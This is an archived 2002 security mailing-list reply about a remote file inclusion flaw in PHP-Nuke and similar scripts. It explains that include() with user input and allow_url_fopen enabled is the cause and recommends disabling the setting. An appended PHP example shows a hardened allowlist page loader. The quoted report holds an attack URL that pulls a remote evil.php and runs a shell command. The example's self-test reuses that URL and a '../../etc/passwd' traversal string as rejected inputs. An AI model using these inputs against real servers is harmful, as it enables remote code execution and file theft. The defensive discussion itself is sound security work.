OSEC

 
From: truff (truffifrance.com)
Date: Mon Jan 21 2002 - 07:43:29 CST


    >Hi All!
    >
    > I've found a serious security flaw in PHP-Nuke.
    > It allows user to execute any PHP code.
    > .....
    > Then just requesting
    > http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al
    > .......

    Hello,

        I used to find this flaw in a lot of _home made_ scripts. This is
    due to the use of the include() function with user-passed parameters,
    and it is not particular to phpnuke. It exists in a lot of scripts
    because the PHP default config allows passing http:// and ftp://
    parameters to functions like include().

    As it is said in the PHP manual:

    "As long as support for the "URL fopen wrapper" is enabled when you
    configure PHP (which it is unless you explicitly pass the
    --disable-url-fopen-wrapper flag to configure (for versions up to
    4.0.3) or set allow_url_fopen to off in php.ini (for newer versions)),
    you can use HTTP and FTP URLs with most functions that take a filename
    as a parameter, including the require() and include() statements."

    Quick Fix:
        Just set allow_url_fopen to off in php.ini.

        - www.projet7.org - Security Researchs

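The include() pattern described in the message above, next to an allowlist-based replacement, as an added example that is not part of the original post and not PHP-Nuke's code. The page names, the `pages_demo` directory and `resolve_page()` are hypothetical; the check at the end also reports `allow_url_include`, the separate directive that has governed URL includes since PHP 5.2.

```php
<?php
// Added example: hypothetical page loader; names are illustrative, not from PHP-Nuke.

// Vulnerable pattern described in the post (left as a comment so it never runs):
//   include($_GET['file']);  // with URL wrappers enabled, 'file' may be an http:// or ftp:// URL

// Hardened form: the request value is only a key into a fixed map of local files.
const PAGES = [                       // constructed allowlist
    'home'  => 'home.php',
    'news'  => 'news.php',
    'about' => 'about.php',
];

function resolve_page(string $baseDir, $requested): ?string
{
    // Reject arrays (?file[]=x) and anything that is not a known key.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    // realpath() returns false for missing files; also confirm the result stays under $base.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;                     // safe to hand to include
}

// Self-check with constructed inputs; only home.php exists on disk.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_demo';
@mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'home.php', "<?php echo 'home';");

$samples = ['home', 'news', 'http://where.the.bad.php.file.is/evil.php', '../../etc/passwd', ['x']];
foreach ($samples as $s) {
    $p = resolve_page($dir, $s);
    printf("%-45s => %s\n", is_array($s) ? 'array' : $s, $p ?? 'rejected');
}

// Defence in depth: log a warning if the runtime would still accept URL wrappers.
foreach (['allow_url_fopen', 'allow_url_include'] as $d) {
    if (filter_var(ini_get($d), FILTER_VALIDATE_BOOLEAN)) {
        error_log("warning: $d is enabled");
    }
}
```

The allowlist also rejects local paths such as `../../etc/passwd`, which the php.ini setting alone does not address.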